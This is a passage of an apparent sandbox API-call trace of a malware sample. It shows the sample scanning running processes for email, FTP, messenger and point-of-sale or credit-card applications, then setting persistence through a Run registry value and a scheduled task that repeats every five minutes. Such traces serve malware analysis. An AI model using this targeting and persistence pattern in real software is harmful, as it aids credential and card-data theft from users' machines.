lpBaseName="operamail.exe") returned 0xd [0073.079] CloseHandle (hObject=0x5a0) returned 1 [0073.079] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x5a0 [0073.079] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.080] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd80000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0073.081] CloseHandle (hObject=0x5a0) returned 1 [0073.081] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x5a0 [0073.081] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.082] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa90000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0073.083] CloseHandle (hObject=0x5a0) returned 1 [0073.083] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b8) returned 0x5a0 [0073.083] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.084] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd30000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0073.084] CloseHandle (hObject=0x5a0) returned 1 [0073.084] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9c8) returned 0x5a0 [0073.084] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.086] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x110000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0073.086] CloseHandle (hObject=0x5a0) returned 1 [0073.086] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9d8) returned 0x5a0 [0073.086] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.088] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1230000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0073.088] CloseHandle (hObject=0x5a0) returned 1 [0073.088] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9e8) returned 0x5a0 [0073.088] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.089] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xad0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0073.090] CloseHandle (hObject=0x5a0) returned 1 [0073.090] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9f8) returned 0x5a0 [0073.090] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.091] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x11e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0073.091] CloseHandle (hObject=0x5a0) returned 1 [0073.091] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa08) returned 0x5a0 [0073.092] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.093] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x800000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0073.093] CloseHandle (hObject=0x5a0) returned 1 [0073.093] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x5a0 [0073.093] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.095] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1180000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0073.095] CloseHandle (hObject=0x5a0) returned 1 [0073.095] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa28) returned 0x5a0 [0073.095] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.097] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xb40000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0073.097] CloseHandle (hObject=0x5a0) returned 1 [0073.097] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa38) returned 0x5a0 [0073.097] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.099] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa30000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0073.099] CloseHandle (hObject=0x5a0) returned 1 [0073.099] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa48) returned 0x5a0 [0073.099] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.101] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x10e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0073.101] CloseHandle (hObject=0x5a0) returned 1 [0073.101] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa58) returned 0x5a0 [0073.101] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.103] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf90000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0073.103] CloseHandle (hObject=0x5a0) returned 1 [0073.103] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0x5a0 [0073.103] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.105] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xe60000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0073.105] CloseHandle (hObject=0x5a0) returned 1 [0073.105] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa78) returned 0x5a0 [0073.105] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.106] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x9c0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0073.107] CloseHandle (hObject=0x5a0) returned 1 [0073.107] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa88) returned 0x5a0 [0073.107] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.108] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1200000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0073.109] CloseHandle (hObject=0x5a0) returned 1 [0073.109] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa98) returned 0x5a0 [0073.109] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.111] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0073.111] CloseHandle (hObject=0x5a0) returned 1 [0073.111] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x5a0 [0073.112] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.113] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xba0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0073.113] CloseHandle (hObject=0x5a0) returned 1 [0073.113] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab8) returned 0x5a0 [0073.113] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.115] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdb0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0073.115] CloseHandle (hObject=0x5a0) returned 1 [0073.115] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xac8) returned 0x5a0 [0073.115] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.117] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xbe0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0073.117] CloseHandle (hObject=0x5a0) returned 1 [0073.117] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xad8) returned 0x5a0 [0073.117] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.118] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0073.119] CloseHandle (hObject=0x5a0) returned 1 [0073.119] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xae8) returned 0x5a0 [0073.119] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.120] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x890000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="isspos.exe") returned 0xa [0073.121] CloseHandle (hObject=0x5a0) returned 1 [0073.121] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf8) returned 0x5a0 [0073.121] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.122] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0073.122] CloseHandle (hObject=0x5a0) returned 1 [0073.123] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb08) returned 0x5a0 [0073.123] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.124] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc60000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="omnipos.exe") returned 0xb [0073.124] CloseHandle (hObject=0x5a0) returned 1 [0073.125] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb18) returned 0x5a0 [0073.125] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.126] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="spcwin.exe") returned 0xa [0073.126] CloseHandle (hObject=0x5a0) returned 1 [0073.126] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb28) returned 0x5a0 [0073.126] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.148] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xbc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0073.148] CloseHandle (hObject=0x5a0) returned 1 [0073.148] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb38) returned 0x5a0 [0073.148] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.150] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="utg2.exe") returned 0x8 [0073.150] CloseHandle (hObject=0x5a0) returned 1 [0073.150] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x5a0 [0073.150] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.151] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x200000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="church.exe") returned 0xa [0073.151] CloseHandle (hObject=0x5a0) returned 1 [0073.151] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x5a0 [0073.151] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.153] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1080000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="commonwealth.exe") returned 0x10 [0073.153] CloseHandle (hObject=0x5a0) returned 1 [0073.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb88) returned 0x0 [0073.153] CloseHandle (hObject=0x0) returned 0 [0073.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x0 [0073.153] CloseHandle (hObject=0x0) returned 0 [0073.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6f8) returned 0x5a0 [0073.153] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.155] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x400000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 0x2a [0073.155] CloseHandle (hObject=0x5a0) returned 1 [0073.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x28) returned 0x659d70 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32e3860 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32e3ac8 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32d9d48 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32d9fb0 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32da218 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32da480 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c5700 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c5968 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c5bd0 [0073.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x25c) returned 0x32c5e38 [0073.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18deb0 | out: phkResult=0x18deb0*=0x5a0) returned 0x0 [0073.174] RegQueryValueExW (in: hKey=0x5a0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18deac, lpData=0x18c5d8, lpcbData=0x18de90*=0x400 | out: lpType=0x18deac*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --AutoStart", lpcbData=0x18de90*=0x114) returned 0x0 [0073.174] RegCloseKey (hKey=0x5a0) returned 0x0 [0073.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x120) returned 0x32a1160 [0073.174] lstrlenA (lpString="\" --AutoStart") returned 13 [0073.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x66d528 [0073.174] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32a1160 | out: hHeap=0x630000) returned 1 [0073.174] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\dfa6d923-216a-4d3a-9d72-28b7181f1996\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned 1 [0073.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x32b2ab0 [0073.175] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x66d528 | out: hHeap=0x630000) returned 1 [0073.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x66d528 [0073.175] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x32b14c8 [0073.175] CoInitialize (pvReserved=0x0) returned 0x0 [0073.204] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0073.204] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x32b75c0 [0073.204] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18de9c | out: ppv=0x18de9c*=0x2a208b8) returned 0x0 [0073.214] TaskScheduler:ITaskService:Connect (This=0x2a208b8, serverName=0x18d928*(varType=0x0, wReserved1=0x66, wReserved2=0xd520, wReserved3=0x66, varVal1=0x7f, varVal2=0x100), user=0x18d938*(varType=0x0, wReserved1=0x0, wReserved2=0x3, wReserved3=0x0, varVal1=0x0, varVal2=0x108), domain=0x18d948*(varType=0x0, wReserved1=0x0, wReserved2=0x100, wReserved3=0x0, varVal1=0x7f, varVal2=0x7), password=0x18d958*(varType=0x0, wReserved1=0x32c, wReserved2=0xde44, wReserved3=0x18, varVal1=0x420cab, varVal2=0x630000)) returned 0x0 [0073.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2f88 [0073.220] TaskScheduler:ITaskService:GetFolder (in: This=0x2a208b8, Path="\\", ppFolder=0x18dea4 | out: ppFolder=0x18dea4*=0x2a20920) returned 0x0 [0073.221] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2f88 | out: hHeap=0x630000) returned 1 [0073.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2f88 [0073.221] ITaskFolder:DeleteTask (This=0x2a20920, Name="Time Trigger Task", flags=0) returned 0x0 [0073.320] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2f88 | out: hHeap=0x630000) returned 1 [0073.321] TaskScheduler:ITaskService:NewTask (in: This=0x2a208b8, flags=0x0, ppDefinition=0x18dea8 | out: ppDefinition=0x18dea8*=0x2a20950) returned 0x0 [0073.321] TaskScheduler:IUnknown:Release (This=0x2a208b8) returned 0x1 [0073.322] ITaskDefinition:get_RegistrationInfo (in: This=0x2a20950, ppRegistrationInfo=0x18de7c | out: ppRegistrationInfo=0x18de7c*=0x2a20a10) returned 0x0 [0073.322] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.322] IRegistrationInfo:put_Author (This=0x2a20a10, Author="Author Name") returned 0x0 [0073.322] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.322] IUnknown:Release (This=0x2a20a10) returned 0x1 [0073.322] ITaskDefinition:get_Principal (in: This=0x2a20950, ppPrincipal=0x18de84 | out: ppPrincipal=0x18de84*=0x2a20ba0) returned 0x0 [0073.323] IPrincipal:put_LogonType (This=0x2a20ba0, LogonType=3) returned 0x0 [0073.323] IUnknown:Release (This=0x2a20ba0) returned 0x1 [0073.323] ITaskDefinition:get_Settings (in: This=0x2a20950, ppSettings=0x18de8c | out: ppSettings=0x18de8c*=0x2a20ac0) returned 0x0 [0073.323] ITaskSettings:put_StartWhenAvailable (This=0x2a20ac0, StartWhenAvailable=1) returned 0x0 [0073.323] IUnknown:Release (This=0x2a20ac0) returned 0x1 [0073.324] ITaskSettings:get_IdleSettings (in: This=0x2a20ac0, ppIdleSettings=0x18de70 | out: ppIdleSettings=0x18de70*=0x2a20b30) returned 0x0 [0073.324] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.324] IIdleSettings:put_WaitTimeout (This=0x2a20b30, WaitTimeout="PT5M") returned 0x0 [0073.324] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.324] IUnknown:Release (This=0x2a20b30) returned 0x1 [0073.324] ITaskDefinition:get_Triggers (in: This=0x2a20950, ppTriggers=0x18de6c | out: ppTriggers=0x18de6c*=0x2a20a80) returned 0x0 [0073.325] ITriggerCollection:Create (in: This=0x2a20a80, Type=1, ppTrigger=0x18de78 | out: ppTrigger=0x18de78*=0x2a20c00) returned 0x0 [0073.325] IUnknown:Release (This=0x2a20a80) returned 0x1 [0073.325] IUnknown:QueryInterface (in: This=0x2a20c00, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18de94 | out: ppvObject=0x18de94*=0x2a20c00) returned 0x0 [0073.325] IUnknown:Release (This=0x2a20c00) returned 0x2 [0073.325] ITrigger:get_Repetition (in: This=0x2a20c00, ppRepeat=0x18de80 | out: ppRepeat=0x18de80*=0x2a20c50) returned 0x0 [0073.325] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.326] IRepetitionPattern:put_Interval (This=0x2a20c50, Interval="PT5M") returned 0x0 [0073.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.326] IRepetitionPattern:put_Duration (This=0x2a20c50, Duration="") returned 0x0 [0073.326] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.326] ITrigger:put_Repetition (This=0x2a20c00, Repetition=0x2a20c50) returned 0x0 [0073.326] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.327] ITrigger:put_Id (This=0x2a20c00, Id="Trigger1") returned 0x0 [0073.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.327] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x32e2fb8 [0073.327] ITrigger:put_EndBoundary (This=0x2a20c00, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0073.327] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.327] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d954 | out: lpSystemTimeAsFileTime=0x18d954*(dwLowDateTime=0x9924d960, dwHighDateTime=0x1d5d6b4)) [0073.337] GetLastError () returned 0x0 [0073.337] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x3316178 [0073.337] GetLastError () returned 0x0 [0073.337] GetLastError () returned 0x0 [0073.337] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0073.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d8bc | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d8bc) returned 26 [0073.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d8bc | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d8bc) returned 26 [0073.341] GetLastError () returned 0x0 [0073.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x3315ff8 [0073.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x3315ff8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0073.341] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x687df0 [0073.342] GetLastError () returned 0x0 [0073.342] ITrigger:put_StartBoundary (This=0x2a20c00, StartBoundary="2020-01-30T02:08:57") returned 0x0 [0073.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e2fb8 | out: hHeap=0x630000) returned 1 [0073.342] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c8628 | out: hHeap=0x630000) returned 1 [0073.342] IUnknown:Release (This=0x2a20c00) returned 0x1 [0073.342] ITaskDefinition:get_Actions (in: This=0x2a20950, ppActions=0x18de88 | out: ppActions=0x18de88*=0x2a209c8) returned 0x0 [0073.342] IActionCollection:Create (in: This=0x2a209c8, Type=0, ppAction=0x18de74 | out: ppAction=0x18de74*=0x2a20c98) returned 0x0 [0073.342] IUnknown:Release (This=0x2a209c8) returned 0x1 [0073.342] IUnknown:QueryInterface (in: This=0x2a20c98, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18de90 | out: ppvObject=0x18de90*=0x2a20c98) returned 0x0 [0073.343] IUnknown:Release (This=0x2a20c98) returned 0x2 [0073.343] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 